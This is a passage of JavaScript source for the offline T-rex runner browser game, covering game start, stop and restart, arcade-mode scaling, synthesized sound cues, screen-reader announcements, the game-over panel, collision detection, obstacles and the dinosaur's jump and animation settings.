if (Runner.audioCues) {
this.generatedSoundFx.stopAll();
announcePhrase(
getA11yString(A11Y_STRINGS.gameOver)
.replace(
'$1',
this.distanceMeter.getActualDistance(this.distanceRan)
.toString()) +
' ' +
getA11yString(A11Y_STRINGS.highScore)
.replace(
'$1',
this.distanceMeter.getActualDistance(this.highestScore)
.toString()));
this.containerEl.setAttribute(
'title', getA11yString(A11Y_STRINGS.ariaLabel));
}
this.showSpeedToggle();
this.disableSpeedToggle(false);
},
stop() {
this.setPlayStatus(false);
this.paused = true;
cancelAnimationFrame(this.raqId);
this.raqId = 0;
this.generatedSoundFx.stopAll();
},
play() {
if (!this.crashed) {
this.setPlayStatus(true);
this.paused = false;
this.tRex.update(0, Trex.status.RUNNING);
this.time = getTimeStamp();
this.update();
this.generatedSoundFx.background();
}
},
restart() {
if (!this.raqId) {
this.playCount++;
this.runningTime = 0;
this.setPlayStatus(true);
this.toggleSpeed();
this.paused = false;
this.crashed = false;
this.distanceRan = 0;
this.setSpeed(this.config.SPEED);
this.time = getTimeStamp();
this.containerEl.classList.remove(Runner.classes.CRASHED);
this.clearCanvas();
this.distanceMeter.reset();
this.horizon.reset();
this.tRex.reset();
this.playSound(this.soundFx.BUTTON_PRESS);
this.invert(true);
this.flashTimer = null;
this.update();
this.gameOverPanel.reset();
this.generatedSoundFx.background();
this.containerEl.setAttribute('title', getA11yString(A11Y_STRINGS.jump));
announcePhrase(getA11yString(A11Y_STRINGS.started));
}
},
setPlayStatus(isPlaying) {
if (this.touchController) {
this.touchController.classList.toggle(HIDDEN_CLASS, !isPlaying);
}
this.playing = isPlaying;
},
/**
* Whether the game should go into arcade mode.
* @return {boolean}
*/
isArcadeMode() {
// In RTL languages the title is wrapped with the left to right mark
// control characters ‪ and ‬ but are invisible.
return IS_RTL ? document.title.indexOf(ARCADE_MODE_URL) == 1 :
document.title === ARCADE_MODE_URL;
},
/**
* Hides offline messaging for a fullscreen game only experience.
*/
setArcadeMode() {
document.body.classList.add(Runner.classes.ARCADE_MODE);
this.setArcadeModeContainerScale();
},
/**
* Sets the scaling for arcade mode.
*/
setArcadeModeContainerScale() {
const windowHeight = window.innerHeight;
const scaleHeight = windowHeight / this.dimensions.HEIGHT;
const scaleWidth = window.innerWidth / this.dimensions.WIDTH;
const scale = Math.max(1, Math.min(scaleHeight, scaleWidth));
const scaledCanvasHeight = this.dimensions.HEIGHT * scale;
// Positions the game container at 10% of the available vertical window
// height minus the game container height.
const translateY = Math.ceil(Math.max(0, (windowHeight - scaledCanvasHeight -
Runner.config.ARCADE_MODE_INITIAL_TOP_POSITION) *
Runner.config.ARCADE_MODE_TOP_POSITION_PERCENT)) *
window.devicePixelRatio;
const cssScale = IS_RTL ? -scale + ',' + scale : scale;
this.containerEl.style.transform =
'scale(' + cssScale + ') translateY(' + translateY + 'px)';
},
/**
* Pause the game if the tab is not in focus.
*/
onVisibilityChange(e) {
if (document.hidden || document.webkitHidden || e.type === 'blur' ||
document.visibilityState !== 'visible') {
this.stop();
} else if (!this.crashed) {
this.tRex.reset();
this.play();
}
},
/**
* Play a sound.
* @param {AudioBuffer} soundBuffer
*/
playSound(soundBuffer) {
if (soundBuffer) {
const sourceNode = this.audioContext.createBufferSource();
sourceNode.buffer = soundBuffer;
sourceNode.connect(this.audioContext.destination);
sourceNode.start(0);
}
},
/**
* Inverts the current page / canvas colors.
* @param {boolean} reset Whether to reset colors.
*/
invert(reset) {
const htmlEl = document.firstElementChild;
if (reset) {
htmlEl.classList.toggle(Runner.classes.INVERTED,
false);
this.invertTimer = 0;
this.inverted = false;
} else {
this.inverted = htmlEl.classList.toggle(
Runner.classes.INVERTED, this.invertTrigger);
}
},
};
/**
* Updates the canvas size taking into
* account the backing store pixel ratio and
* the device pixel ratio.
*
* See article by Paul Lewis:
* http://www.html5rocks.com/en/tutorials/canvas/hidpi/
*
* @param {HTMLCanvasElement} canvas
* @param {number=} opt_width
* @param {number=} opt_height
* @return {boolean} Whether the canvas was scaled.
*/
Runner.updateCanvasScaling = function(canvas, opt_width, opt_height) {
const context =
/** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
// Query the various pixel ratios
const devicePixelRatio = Math.floor(window.devicePixelRatio) || 1;
/** @suppress {missingProperties} */
const backingStoreRatio =
Math.floor(context.webkitBackingStorePixelRatio) || 1;
const ratio = devicePixelRatio / backingStoreRatio;
// Upscale the canvas if the two ratios don't match
if (devicePixelRatio !== backingStoreRatio) {
const oldWidth = opt_width || canvas.width;
const oldHeight = opt_height || canvas.height;
canvas.width = oldWidth * ratio;
canvas.height = oldHeight * ratio;
canvas.style.width = oldWidth + 'px';
canvas.style.height = oldHeight + 'px';
// Scale the context to counter the fact that we've manually scaled
// our canvas element.
context.scale(ratio, ratio);
return true;
} else if (devicePixelRatio === 1) {
// Reset the canvas width / height. Fixes scaling bug when the page is
// zoomed and the devicePixelRatio changes accordingly.
canvas.style.width = canvas.width + 'px';
canvas.style.height = canvas.height + 'px';
}
return false;
};
/**
* Whether events are enabled.
* @return {boolean}
*/
Runner.isAltGameModeEnabled = function() {
return loadTimeData && loadTimeData.valueExists('enableAltGameMode');
};
/**
* Generated sound FX class for audio cues.
* @constructor
*/
function GeneratedSoundFx() {
this.audioCues = false;
this.context = null;
this.panner = null;
}
GeneratedSoundFx.prototype = {
init() {
this.audioCues = true;
if (!this.context) {
// iOS only supports the webkit version.
this.context = window.webkitAudioContext ? new webkitAudioContext() :
new AudioContext();
if (IS_IOS) {
this.context.onstatechange = (function() {
if (this.context.state != 'running') {
this.context.resume();
}
}).bind(this);
this.context.resume();
}
this.panner = this.context.createStereoPanner ?
this.context.createStereoPanner() :
null;
}
},
stopAll() {
this.cancelFootSteps();
},
/**
* Play oscillators at certain frequency and for a certain time.
* @param {number} frequency
* @param {number} startTime
* @param {number} duration
* @param {?number=} opt_vol
* @param {number=} opt_pan
*/
playNote(frequency, startTime, duration, opt_vol, opt_pan) {
const osc1 = this.context.createOscillator();
const osc2 = this.context.createOscillator();
const volume = this.context.createGain();
// Set oscillator wave type
osc1.type = 'triangle';
osc2.type = 'triangle';
volume.gain.value = 0.1;
// Set up node routing
if (this.panner) {
this.panner.pan.value = opt_pan || 0;
osc1.connect(volume).connect(this.panner);
osc2.connect(volume).connect(this.panner);
this.panner.connect(this.context.destination);
} else {
osc1.connect(volume);
osc2.connect(volume);
volume.connect(this.context.destination);
}
// Detune oscillators for chorus effect
osc1.frequency.value = frequency + 1;
osc2.frequency.value = frequency - 2;
// Fade out
volume.gain.setValueAtTime(opt_vol || 0.01, startTime + duration - 0.05);
volume.gain.linearRampToValueAtTime(0.00001, startTime + duration);
// Start oscillators
osc1.start(startTime);
osc2.start(startTime);
// Stop oscillators
osc1.stop(startTime + duration);
osc2.stop(startTime + duration);
},
background() {
if (this.audioCues) {
const now = this.context.currentTime;
this.playNote(493.883, now, 0.116);
this.playNote(659.255, now + 0.116, 0.232);
this.loopFootSteps();
}
},
loopFootSteps() {
if (this.audioCues && !this.bgSoundIntervalId) {
this.bgSoundIntervalId = setInterval(function() {
this.playNote(73.42, this.context.currentTime, 0.05, 0.16);
this.playNote(69.30, this.context.currentTime + 0.116, 0.116, 0.16);
}.bind(this), 280);
}
},
cancelFootSteps() {
if (this.audioCues && this.bgSoundIntervalId) {
clearInterval(this.bgSoundIntervalId);
this.bgSoundIntervalId = null;
this.playNote(103.83, this.context.currentTime, 0.232, 0.02);
this.playNote(116.54, this.context.currentTime + 0.116, 0.232, 0.02);
}
},
collect() {
if (this.audioCues) {
this.cancelFootSteps();
const now = this.context.currentTime;
this.playNote(830.61, now, 0.116);
this.playNote(1318.51, now + 0.116, 0.232);
}
},
jump() {
if (this.audioCues) {
const now = this.context.currentTime;
this.playNote(659.25, now, 0.116, 0.3, -0.6);
this.playNote(880, now + 0.116, 0.232, 0.3, -0.6);
}
},
};
/**
* Speak a phrase using Speech Synthesis API for a11y.
* @param {string} phrase Sentence to speak.
*/
function speakPhrase(phrase) {
if ('speechSynthesis' in window) {
const msg = new SpeechSynthesisUtterance(phrase);
const voices = window.speechSynthesis.getVoices();
msg.text = phrase;
speechSynthesis.speak(msg);
}
}
/**
* For screen readers make an announcement to the live region.
* @param {string} phrase Sentence to speak.
*/
function announcePhrase(phrase) {
if (Runner.a11yStatusEl) {
Runner.a11yStatusEl.textContent = '';
Runner.a11yStatusEl.textContent = phrase;
}
}
/**
* Returns a string from loadTimeData data object.
* @param {string} stringName
* @return {string}
*/
function getA11yString(stringName) {
return loadTimeData && loadTimeData.valueExists(stringName) ?
loadTimeData.getString(stringName) :
'';
}
/**
* Get random number.
* @param {number} min
* @param {number} max
*/
function getRandomNum(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
/**
* Vibrate on mobile devices.
* @param {number} duration Duration of the vibration in milliseconds.
*/
function vibrate(duration) {
if (IS_MOBILE && window.navigator.vibrate) {
window.navigator.vibrate(duration);
}
}
/**
* Create canvas element.
* @param {Element} container Element to append canvas to.
* @param {number} width
* @param {number} height
* @param {string=} opt_classname
* @return {HTMLCanvasElement}
*/
function createCanvas(container, width, height, opt_classname) {
const canvas =
/** @type {!HTMLCanvasElement} */ (document.createElement('canvas'));
canvas.className = opt_classname ? Runner.classes.CANVAS + ' ' +
opt_classname : Runner.classes.CANVAS;
canvas.width = width;
canvas.height = height;
container.appendChild(canvas);
return canvas;
}
/**
* Decodes the base 64 audio to ArrayBuffer used by Web Audio.
* @param {string} base64String
*/
function decodeBase64ToArrayBuffer(base64String) {
const len = (base64String.length / 4) * 3;
const str = atob(base64String);
const arrayBuffer = new ArrayBuffer(len);
const bytes = new Uint8Array(arrayBuffer);
for (let i = 0; i < len; i++) {
bytes[i] = str.charCodeAt(i);
}
return bytes.buffer;
}
/**
* Return the current timestamp.
* @return {number}
*/
function getTimeStamp() {
return IS_IOS ? new Date().getTime() : performance.now();
}
//******************************************************************************
/**
* Game over panel.
* @param {!HTMLCanvasElement} canvas
* @param {Object} textImgPos
* @param {Object} restartImgPos
* @param {!Object} dimensions Canvas dimensions.
* @param {Object=} opt_altGameEndImgPos
* @param {boolean=} opt_altGameActive
* @constructor
*/
function GameOverPanel(
canvas, textImgPos, restartImgPos, dimensions, opt_altGameEndImgPos,
opt_altGameActive) {
this.canvas = canvas;
this.canvasCtx =
/** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
this.canvasDimensions = dimensions;
this.textImgPos = textImgPos;
this.restartImgPos = restartImgPos;
this.altGameEndImgPos = opt_altGameEndImgPos;
this.altGameModeActive = opt_altGameActive;
// Retry animation.
this.frameTimeStamp = 0;
this.animTimer = 0;
this.currentFrame = 0;
this.gameOverRafId = null;
this.flashTimer = 0;
this.flashCounter = 0;
this.originalText = true;
}
GameOverPanel.RESTART_ANIM_DURATION = 875;
GameOverPanel.LOGO_PAUSE_DURATION = 875;
GameOverPanel.FLASH_ITERATIONS = 5;
/**
* Animation frames spec.
*/
GameOverPanel.animConfig = {
frames: [0, 36, 72, 108, 144, 180, 216, 252],
msPerFrame: GameOverPanel.RESTART_ANIM_DURATION / 8,
};
/**
* Dimensions used in the panel.
* @enum {number}
*/
GameOverPanel.dimensions = {
TEXT_X: 0,
TEXT_Y: 13,
TEXT_WIDTH: 191,
TEXT_HEIGHT: 11,
RESTART_WIDTH: 36,
RESTART_HEIGHT: 32,
};
GameOverPanel.prototype = {
/**
* Update the panel dimensions.
* @param {number} width New canvas width.
* @param {number} opt_height Optional new canvas height.
*/
updateDimensions(width, opt_height) {
this.canvasDimensions.WIDTH = width;
if (opt_height) {
this.canvasDimensions.HEIGHT = opt_height;
}
this.currentFrame = GameOverPanel.animConfig.frames.length - 1;
},
drawGameOverText(dimensions, opt_useAltText) {
const centerX = this.canvasDimensions.WIDTH / 2;
let textSourceX = dimensions.TEXT_X;
let textSourceY = dimensions.TEXT_Y;
let textSourceWidth = dimensions.TEXT_WIDTH;
let textSourceHeight = dimensions.TEXT_HEIGHT;
const textTargetX = Math.round(centerX - (dimensions.TEXT_WIDTH / 2));
const textTargetY = Math.round((this.canvasDimensions.HEIGHT - 25) / 3);
const textTargetWidth = dimensions.TEXT_WIDTH;
const textTargetHeight = dimensions.TEXT_HEIGHT;
if (IS_HIDPI) {
textSourceY *= 2;
textSourceX *= 2;
textSourceWidth *= 2;
textSourceHeight *= 2;
}
if (!opt_useAltText) {
textSourceX += this.textImgPos.x;
textSourceY += this.textImgPos.y;
}
const spriteSource =
opt_useAltText ? Runner.altCommonImageSprite : Runner.origImageSprite;
this.canvasCtx.save();
if (IS_RTL) {
this.canvasCtx.translate(this.canvasDimensions.WIDTH, 0);
this.canvasCtx.scale(-1, 1);
}
// Game over text from sprite.
this.canvasCtx.drawImage(
spriteSource, textSourceX, textSourceY, textSourceWidth,
textSourceHeight, textTargetX, textTargetY, textTargetWidth,
textTargetHeight);
this.canvasCtx.restore();
},
/**
* Draw additional adornments for alternative game types.
*/
drawAltGameElements(tRex) {
// Additional adornments.
if (this.altGameModeActive && Runner.spriteDefinition.ALT_GAME_END_CONFIG) {
const altGameEndConfig = Runner.spriteDefinition.ALT_GAME_END_CONFIG;
let altGameEndSourceWidth = altGameEndConfig.WIDTH;
let altGameEndSourceHeight = altGameEndConfig.HEIGHT;
const altGameEndTargetX = tRex.xPos + altGameEndConfig.X_OFFSET;
const altGameEndTargetY = tRex.yPos + altGameEndConfig.Y_OFFSET;
if (IS_HIDPI) {
altGameEndSourceWidth *= 2;
altGameEndSourceHeight *= 2;
}
this.canvasCtx.drawImage(
Runner.altCommonImageSprite, this.altGameEndImgPos.x,
this.altGameEndImgPos.y, altGameEndSourceWidth,
altGameEndSourceHeight, altGameEndTargetX, altGameEndTargetY,
altGameEndConfig.WIDTH, altGameEndConfig.HEIGHT);
}
},
/**
* Draw restart button.
*/
drawRestartButton() {
const dimensions = GameOverPanel.dimensions;
let framePosX = GameOverPanel.animConfig.frames[this.currentFrame];
let restartSourceWidth = dimensions.RESTART_WIDTH;
let restartSourceHeight = dimensions.RESTART_HEIGHT;
const restartTargetX =
(this.canvasDimensions.WIDTH / 2) - (dimensions.RESTART_WIDTH / 2);
const restartTargetY = this.canvasDimensions.HEIGHT / 2;
if (IS_HIDPI) {
restartSourceWidth *= 2;
restartSourceHeight *= 2;
framePosX *= 2;
}
this.canvasCtx.save();
if (IS_RTL) {
this.canvasCtx.translate(this.canvasDimensions.WIDTH, 0);
this.canvasCtx.scale(-1, 1);
}
this.canvasCtx.drawImage(
Runner.origImageSprite, this.restartImgPos.x + framePosX,
this.restartImgPos.y, restartSourceWidth, restartSourceHeight,
restartTargetX, restartTargetY, dimensions.RESTART_WIDTH,
dimensions.RESTART_HEIGHT);
this.canvasCtx.restore();
},
/**
* Draw the panel.
* @param {boolean} opt_altGameModeActive
* @param {!Trex} opt_tRex
*/
draw(opt_altGameModeActive, opt_tRex) {
if (opt_altGameModeActive) {
this.altGameModeActive = opt_altGameModeActive;
}
this.drawGameOverText(GameOverPanel.dimensions, false);
this.drawRestartButton();
this.drawAltGameElements(opt_tRex);
this.update();
},
/**
* Update animation frames.
*/
update() {
const now = getTimeStamp();
const deltaTime = now - (this.frameTimeStamp || now);
this.frameTimeStamp = now;
this.animTimer += deltaTime;
this.flashTimer += deltaTime;
// Restart Button
if (this.currentFrame == 0 &&
this.animTimer > GameOverPanel.LOGO_PAUSE_DURATION) {
this.animTimer = 0;
this.currentFrame++;
this.drawRestartButton();
} else if (
this.currentFrame > 0 &&
this.currentFrame < GameOverPanel.animConfig.frames.length) {
if (this.animTimer >= GameOverPanel.animConfig.msPerFrame) {
this.currentFrame++;
this.drawRestartButton();
}
} else if (
!this.altGameModeActive &&
this.currentFrame == GameOverPanel.animConfig.frames.length) {
this.reset();
return;
}
// Game over text
if (this.altGameModeActive &&
Runner.spriteDefinitionByType.original.ALT_GAME_OVER_TEXT_CONFIG) {
const altTextConfig =
Runner.spriteDefinitionByType.original.ALT_GAME_OVER_TEXT_CONFIG;
if (this.flashCounter < GameOverPanel.FLASH_ITERATIONS &&
this.flashTimer > altTextConfig.FLASH_DURATION) {
this.flashTimer = 0;
this.originalText = !this.originalText;
this.clearGameOverTextBounds();
if (this.originalText) {
this.drawGameOverText(GameOverPanel.dimensions, false);
this.flashCounter++;
} else {
this.drawGameOverText(altTextConfig, true);
}
} else if (this.flashCounter >= GameOverPanel.FLASH_ITERATIONS) {
this.reset();
return;
}
}
this.gameOverRafId = requestAnimationFrame(this.update.bind(this));
},
/**
* Clear game over text.
*/
clearGameOverTextBounds() {
this.canvasCtx.save();
this.canvasCtx.clearRect(
Math.round(
this.canvasDimensions.WIDTH / 2 -
(GameOverPanel.dimensions.TEXT_WIDTH / 2)),
Math.round((this.canvasDimensions.HEIGHT - 25) / 3),
GameOverPanel.dimensions.TEXT_WIDTH,
GameOverPanel.dimensions.TEXT_HEIGHT + 4);
this.canvasCtx.restore();
},
reset() {
if (this.gameOverRafId) {
cancelAnimationFrame(this.gameOverRafId);
this.gameOverRafId = null;
}
this.animTimer = 0;
this.frameTimeStamp = 0;
this.currentFrame = 0;
this.flashTimer = 0;
this.flashCounter = 0;
this.originalText = true;
},
};
//******************************************************************************
/**
* Check for a collision.
* @param {!Obstacle} obstacle
* @param {!Trex} tRex T-rex object.
* @param {CanvasRenderingContext2D=} opt_canvasCtx Optional canvas context for
* drawing collision boxes.
* @return {Array<CollisionBox>|undefined}
*/
function checkForCollision(obstacle, tRex, opt_canvasCtx) {
const obstacleBoxXPos = Runner.defaultDimensions.WIDTH + obstacle.xPos;
// Adjustments are made to the bounding box as there is a 1 pixel white
// border around the t-rex and obstacles.
const tRexBox = new CollisionBox(
tRex.xPos + 1,
tRex.yPos + 1,
tRex.config.WIDTH - 2,
tRex.config.HEIGHT - 2);
const obstacleBox = new CollisionBox(
obstacle.xPos + 1,
obstacle.yPos + 1,
obstacle.typeConfig.width * obstacle.size - 2,
obstacle.typeConfig.height - 2);
// Debug outer box
if (opt_canvasCtx) {
drawCollisionBoxes(opt_canvasCtx, tRexBox, obstacleBox);
}
// Simple outer bounds check.
if (boxCompare(tRexBox, obstacleBox)) {
const collisionBoxes = obstacle.collisionBoxes;
let tRexCollisionBoxes = [];
if (Runner.isAltGameModeEnabled()) {
tRexCollisionBoxes = Runner.spriteDefinition.TREX.COLLISION_BOXES;
} else {
tRexCollisionBoxes = tRex.ducking ? Trex.collisionBoxes.DUCKING :
Trex.collisionBoxes.RUNNING;
}
// Detailed axis aligned box check.
for (let t = 0; t < tRexCollisionBoxes.length; t++) {
for (let i = 0; i < collisionBoxes.length; i++) {
// Adjust the box to actual positions.
const adjTrexBox =
createAdjustedCollisionBox(tRexCollisionBoxes[t], tRexBox);
const adjObstacleBox =
createAdjustedCollisionBox(collisionBoxes[i], obstacleBox);
const crashed = boxCompare(adjTrexBox, adjObstacleBox);
// Draw boxes for debug.
if (opt_canvasCtx) {
drawCollisionBoxes(opt_canvasCtx, adjTrexBox, adjObstacleBox);
}
if (crashed) {
return [adjTrexBox, adjObstacleBox];
}
}
}
}
}
/**
* Adjust the collision box.
* @param {!CollisionBox} box The original box.
* @param {!CollisionBox} adjustment Adjustment box.
* @return {CollisionBox} The adjusted collision box object.
*/
function createAdjustedCollisionBox(box, adjustment) {
return new CollisionBox(
box.x + adjustment.x,
box.y + adjustment.y,
box.width,
box.height);
}
/**
* Draw the collision boxes for debug.
*/
function drawCollisionBoxes(canvasCtx, tRexBox, obstacleBox) {
canvasCtx.save();
canvasCtx.strokeStyle = '#f00';
canvasCtx.strokeRect(tRexBox.x, tRexBox.y, tRexBox.width, tRexBox.height);
canvasCtx.strokeStyle = '#0f0';
canvasCtx.strokeRect(obstacleBox.x, obstacleBox.y,
obstacleBox.width, obstacleBox.height);
canvasCtx.restore();
}
/**
* Compare two collision boxes for a collision.
* @param {CollisionBox} tRexBox
* @param {CollisionBox} obstacleBox
* @return {boolean} Whether the boxes intersected.
*/
function boxCompare(tRexBox, obstacleBox) {
let crashed = false;
const tRexBoxX = tRexBox.x;
const tRexBoxY = tRexBox.y;
const obstacleBoxX = obstacleBox.x;
const obstacleBoxY = obstacleBox.y;
// Axis-Aligned Bounding Box method.
if (tRexBox.x < obstacleBoxX + obstacleBox.width &&
tRexBox.x + tRexBox.width > obstacleBoxX &&
tRexBox.y < obstacleBox.y + obstacleBox.height &&
tRexBox.height + tRexBox.y > obstacleBox.y) {
crashed = true;
}
return crashed;
}
//******************************************************************************
/**
* Collision box object.
* @param {number} x X position.
* @param {number} y Y Position.
* @param {number} w Width.
* @param {number} h Height.
* @constructor
*/
function CollisionBox(x, y, w, h) {
this.x = x;
this.y = y;
this.width = w;
this.height = h;
}
//******************************************************************************
/**
* Obstacle.
* @param {CanvasRenderingContext2D} canvasCtx
* @param {ObstacleType} type
* @param {Object} spriteImgPos Obstacle position in sprite.
* @param {Object} dimensions
* @param {number} gapCoefficient Mutipler in determining the gap.
* @param {number} speed
* @param {number=} opt_xOffset
* @param {boolean=} opt_isAltGameMode
* @constructor
*/
function Obstacle(
canvasCtx, type, spriteImgPos, dimensions, gapCoefficient, speed,
opt_xOffset, opt_isAltGameMode) {
this.canvasCtx = canvasCtx;
this.spritePos = spriteImgPos;
this.typeConfig = type;
this.gapCoefficient = Runner.slowDown ? gapCoefficient * 2 : gapCoefficient;
this.size = getRandomNum(1, Obstacle.MAX_OBSTACLE_LENGTH);
this.dimensions = dimensions;
this.remove = false;
this.xPos = dimensions.WIDTH + (opt_xOffset || 0);
this.yPos = 0;
this.width = 0;
this.collisionBoxes = [];
this.gap = 0;
this.speedOffset = 0;
this.altGameModeActive = opt_isAltGameMode;
this.imageSprite = this.typeConfig.type == 'COLLECTABLE' ?
Runner.altCommonImageSprite :
this.altGameModeActive ? Runner.altGameImageSprite : Runner.imageSprite;
// For animated obstacles.
this.currentFrame = 0;
this.timer = 0;
this.init(speed);
}
/**
* Coefficient for calculating the maximum gap.
*/
Obstacle.MAX_GAP_COEFFICIENT = 1.5;
/**
* Maximum obstacle grouping count.
*/
Obstacle.MAX_OBSTACLE_LENGTH = 3;
Obstacle.prototype = {
/**
* Initialise the DOM for the obstacle.
* @param {number} speed
*/
init(speed) {
this.cloneCollisionBoxes();
// Only allow sizing if we're at the right speed.
if (this.size > 1 && this.typeConfig.multipleSpeed > speed) {
this.size = 1;
}
this.width = this.typeConfig.width * this.size;
// Check if obstacle can be positioned at various heights.
if (Array.isArray(this.typeConfig.yPos)) {
const yPosConfig =
IS_MOBILE ? this.typeConfig.yPosMobile : this.typeConfig.yPos;
this.yPos = yPosConfig[getRandomNum(0, yPosConfig.length - 1)];
} else {
this.yPos = this.typeConfig.yPos;
}
this.draw();
// Make collision box adjustments,
// Central box is adjusted to the size as one box.
// ____ ______ ________
// _| |-| _| |-| _| |-|
// | |<->| | | |<--->| | | |<----->| |
// | | 1 | | | | 2 | | | | 3 | |
// |_|___|_| |_|_____|_| |_|_______|_|
//
if (this.size > 1) {
this.collisionBoxes[1].width = this.width - this.collisionBoxes[0].width -
this.collisionBoxes[2].width;
this.collisionBoxes[2].x = this.width - this.collisionBoxes[2].width;
}
// For obstacles that go at a different speed from the horizon.
if (this.typeConfig.speedOffset) {
this.speedOffset = Math.random() > 0.5 ? this.typeConfig.speedOffset :
-this.typeConfig.speedOffset;
}
this.gap = this.getGap(this.gapCoefficient, speed);
// Increase gap for audio cues enabled.
if (Runner.audioCues) {
this.gap *= 2;
}
},
/**
* Draw and crop based on size.
*/
draw() {
let sourceWidth = this.typeConfig.width;
let sourceHeight = this.typeConfig.height;
if (IS_HIDPI) {
sourceWidth = sourceWidth * 2;
sourceHeight = sourceHeight * 2;
}
// X position in sprite.
let sourceX =
(sourceWidth * this.size) * (0.5 * (this.size - 1)) + this.spritePos.x;
// Animation frames.
if (this.currentFrame > 0) {
sourceX += sourceWidth * this.currentFrame;
}
this.canvasCtx.drawImage(
this.imageSprite, sourceX, this.spritePos.y, sourceWidth * this.size,
sourceHeight, this.xPos, this.yPos, this.typeConfig.width * this.size,
this.typeConfig.height);
},
/**
* Obstacle frame update.
* @param {number} deltaTime
* @param {number} speed
*/
update(deltaTime, speed) {
if (!this.remove) {
if (this.typeConfig.speedOffset) {
speed += this.speedOffset;
}
this.xPos -= Math.floor((speed * FPS / 1000) * deltaTime);
// Update frame
if (this.typeConfig.numFrames) {
this.timer += deltaTime;
if (this.timer >= this.typeConfig.frameRate) {
this.currentFrame =
this.currentFrame === this.typeConfig.numFrames - 1 ?
0 :
this.currentFrame + 1;
this.timer = 0;
}
}
this.draw();
if (!this.isVisible()) {
this.remove = true;
}
}
},
/**
* Calculate a random gap size.
* - Minimum gap gets wider as speed increses
* @param {number} gapCoefficient
* @param {number} speed
* @return {number} The gap size.
*/
getGap(gapCoefficient, speed) {
const minGap = Math.round(
this.width * speed + this.typeConfig.minGap * gapCoefficient);
const maxGap = Math.round(minGap * Obstacle.MAX_GAP_COEFFICIENT);
return getRandomNum(minGap, maxGap);
},
/**
* Check if obstacle is visible.
* @return {boolean} Whether the obstacle is in the game area.
*/
isVisible() {
return this.xPos + this.width > 0;
},
/**
* Make a copy of the collision boxes, since these will change based on
* obstacle type and size.
*/
cloneCollisionBoxes() {
const collisionBoxes = this.typeConfig.collisionBoxes;
for (let i = collisionBoxes.length - 1; i >= 0; i--) {
this.collisionBoxes[i] = new CollisionBox(
collisionBoxes[i].x, collisionBoxes[i].y, collisionBoxes[i].width,
collisionBoxes[i].height);
}
},
};
//******************************************************************************
/**
* T-rex game character.
* @param {HTMLCanvasElement} canvas
* @param {Object} spritePos Positioning within image sprite.
* @constructor
*/
function Trex(canvas, spritePos) {
this.canvas = canvas;
this.canvasCtx =
/** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
this.spritePos = spritePos;
this.xPos = 0;
this.yPos = 0;
this.xInitialPos = 0;
// Position when on the ground.
this.groundYPos = 0;
this.currentFrame = 0;
this.currentAnimFrames = [];
this.blinkDelay = 0;
this.blinkCount = 0;
this.animStartTime = 0;
this.timer = 0;
this.msPerFrame = 1000 / FPS;
this.config = Object.assign(Trex.config, Trex.normalJumpConfig);
// Current status.
this.status = Trex.status.WAITING;
this.jumping = false;
this.ducking = false;
this.jumpVelocity = 0;
this.reachedMinHeight = false;
this.speedDrop = false;
this.jumpCount = 0;
this.jumpspotX = 0;
this.altGameModeEnabled = false;
this.flashing = false;
this.init();
}
/**
* T-rex player config.
*/
Trex.config = {
DROP_VELOCITY: -5,
FLASH_OFF: 175,
FLASH_ON: 100,
HEIGHT: 47,
HEIGHT_DUCK: 25,
INTRO_DURATION: 1500,
SPEED_DROP_COEFFICIENT: 3,
SPRITE_WIDTH: 262,
START_X_POS: 50,
WIDTH: 44,
WIDTH_DUCK: 59,
};
Trex.slowJumpConfig = {
GRAVITY: 0.25,
MAX_JUMP_HEIGHT: 50,
MIN_JUMP_HEIGHT: 45,
INITIAL_JUMP_VELOCITY: -20,
};
Trex.normalJumpConfig = {
GRAVITY: 0.6,
MAX_JUMP_HEIGHT: 30,
MIN_JUMP_HEIGHT: 30,
INITIAL_JUMP_VELOCITY: -10,
};
/**
* Used in collision detection.
* @enum {Array<CollisionBox>}
*/
Trex.collisionBoxes = {
DUCKING: [new CollisionBox(1, 18, 55, 25)],
RUNNING: [
new CollisionBox(22, 0, 17, 16),
new CollisionBox(1, 18, 30, 9),
new CollisionBox(10, 35, 14, 8),
new CollisionBox(1, 24, 29, 5),
new CollisionBox(5, 30, 21, 4),
new CollisionBox(9, 34, 15, 4),
],
};
/**
* Animation states.
* @enum {string}
*/
Trex.status = {
CRASHED: 'CRASHED',
DUCKING: 'DUCKING',
JUMPING: 'JUMPING',
RUNNING: 'RUNNING',
WAITING: 'WAITING',
};
/**
* Blinking coefficient.
* @const
*/
Trex.BLINK_TIMING = 7000;
/**
* Animation config for different states.
* @enum {Object}
*/
Trex.animFrames = {
WAITING: {
frames: [44, 0],
msPerFrame: 1000 / 3,
},
RUNNING: {
frames: [88, 132],
msPerFrame: 1000 / 12,
},
CRASHED: {
frames: [220],
msPerFrame: 1000 / 60,
},
JUMPING: {
frames: [0],
msPerFrame: 1000 / 60,
},
DUCKING: {
frames: [264, 323],
msPerFrame: 1000 / 8,
},
};
Trex.prototype = {
/**
* T-rex player initaliser.
* Sets the t-rex to blink at random intervals.
*/
init() {
this.groundYPos = Runner.defaultDimensions.HEIGHT - this.config.HEIGHT -
Runner.config.BOTTOM_PAD;
this.yPos = this.groundYPos;
this.minJumpHeight = this.groundYPos - this.config.MIN_JUMP_HEIGHT;
this.draw(0, 0);
this.update(0, Trex.status.WAITING);
},
/**
* Assign the appropriate jump parameters based on the game speed.
*/
enableSlowConfig: function() {
const jumpConfig =
Runner.slowDown ? Trex.slowJumpConfig : Trex.normalJumpConfig;
Trex.config = Object.assign(Trex.config, jumpConfig);
this.adjustAltGameConfigForSlowSpeed();
},
/**
* Enables the alternative game. Redefines the dino config.
* @param {Object} spritePos New positioning within image sprite.
*/
enableAltGameMode: function(spritePos) {
this.altGameModeEnabled = true;
this.spritePos = spritePos;
const spriteDefinition = Runner.spriteDefinition['TREX'];
// Update animation frames.
Trex.animFrames.RUNNING.frames =
[spriteDefinition.RUNNING_1.x, spriteDefinition.RUNNING_2.x];
Trex.animFrames.CRASHED.frames = [spriteDefinition.CRASHED.x];
if (typeof spriteDefinition.JUMPING.x == 'object') {
Trex.animFrames.JUMPING.frames = spriteDefinition.JUMPING.x;
} else {
Trex.animFrames.JUMPING.frames = [spriteDefinition.JUMPING.x];
}
Trex.animFrames.DUCKING.frames =
[spriteDefinition.RUNNING_1.x, spriteDefinition.RUNNING_2.x];
// Update Trex config
